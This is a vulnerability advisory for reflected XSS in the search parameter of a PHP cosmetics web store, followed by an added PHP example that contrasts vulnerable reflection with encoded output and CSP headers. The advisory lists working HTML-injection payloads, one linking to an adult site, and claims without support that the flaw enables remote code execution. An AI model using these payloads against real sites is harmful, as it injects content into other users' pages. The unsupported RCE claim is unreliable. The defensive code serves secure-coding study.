## Title: Cosmetics and Beauty Product Online Store v1.0 remote Multiple XSS-Reflected
## Author: nu11secur1ty
## Date: 02.18.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html
## CVE-Cosmetics and Beauty Product Online Store v1.0

## Description:
The `search` parameter of the /cbpos/ app in Cosmetics and Beauty Product Online Store v1.0 appears to be vulnerable to multiple reflected XSS attacks. An attacker can use it to take very sensitive information from the system and can even prepare a very dangerous RCE by using this XSS vulnerability.

Status: CRITICAL

[+] Payloads:

```URL
<a href="https://www.pornhub.com/">Please visit our beauty store!</a>
<a href="https://www.nu11secur1ty.com/"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">
```

- RCE example:

```URL
<a href="http://192.168.1.8/cbpos/uploads/product_4/banner.3.jpg"><img src=https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif">
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/2022/Cosmetics-and-Beauty-Product-Online-Store)

## Proof and Exploit:
[href](https://streamable.com/sbzew8)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/

hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
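The root cause of a reflected XSS like the one reported above is a request parameter written back into the HTML response without output encoding. The PHP script below is an added example, not code from the Cosmetics and Beauty Product Online Store project or from the advisory author; it assumes (as a hypothetical) that the application's search page reflects `$_GET['search']` into both an input attribute and the page body, and contrasts that pattern with a hardened rendering. The function names `renderSearchVulnerable`, `renderSearchHardened`, `esc` and `securityHeaders` and the sample input are all constructed for this illustration.

```php
<?php
// Added example (not code from the Cosmetics and Beauty Product Online Store project).
// Assumption (hypothetical): the search page reflects $_GET['search'] into a value=""
// attribute and into the HTML body without encoding. Both render functions take the raw
// parameter as an argument so the script can be run from the CLI with a constructed value:
//   php xss_demo.php '<a href="https://example.invalid/"><img src="x"></a>'

declare(strict_types=1);

// Vulnerable pattern: the raw parameter is concatenated straight into HTML, so any
// markup in it becomes live elements in the victim's browser.
function renderSearchVulnerable(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '">'
         . "\n<p>Results for: " . $search . '</p>';
}

// Hardened pattern: contextual output encoding. ENT_QUOTES encodes both quote styles,
// so the value is safe inside a double-quoted attribute as well as in text content;
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderSearchHardened(string $search): string
{
    return '<input type="text" name="search" value="' . esc($search) . '">'
         . "\n<p>Results for: " . esc($search) . '</p>';
}

// Defence in depth: response headers to send alongside encoding. A CSP without
// 'unsafe-inline' prevents an injected inline <script> or on* handler from executing
// even if one encoding call is missed. Returned as an array so a caller can emit each
// entry with header() inside a real request.
function securityHeaders(): array
{
    return [
        "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'",
        'X-Content-Type-Options: nosniff',
        'Content-Type: text/html; charset=UTF-8',
    ];
}

// Constructed sample input shaped like the markup the advisory reflects (an anchor
// wrapping an image). Vulnerable rendering turns it into live HTML; hardened rendering
// displays it literally.
$sample = $argv[1] ?? '<a href="https://example.invalid/"><img src="x"></a>';

echo "--- vulnerable ---\n", renderSearchVulnerable($sample), "\n\n";
echo "--- hardened ---\n", renderSearchHardened($sample), "\n\n";
echo "--- headers ---\n", implode("\n", securityHeaders()), "\n";

// Self-check: after encoding, the user-controlled value must contain no raw '<' or '"'.
$encoded = esc($sample);
if (strpos($encoded, '<') !== false || strpos($encoded, '"') !== false) {
    fwrite(STDERR, "encoding failed\n");
    exit(1);
}
```

Running the script with the default sample prints the anchor and image as live tags in the vulnerable block and as `&lt;a href=&quot;...&quot;&gt;` in the hardened block. When reviewing a PHP application for this class of bug, every `echo`/`print` of a `$_GET`, `$_POST` or `$_REQUEST` value (or of a variable derived from one) that is not wrapped in `htmlspecialchars()` with `ENT_QUOTES`, or in a template engine's auto-escaping, is a candidate finding; the CSP header is the compensating control that limits impact while the encoding gaps are closed.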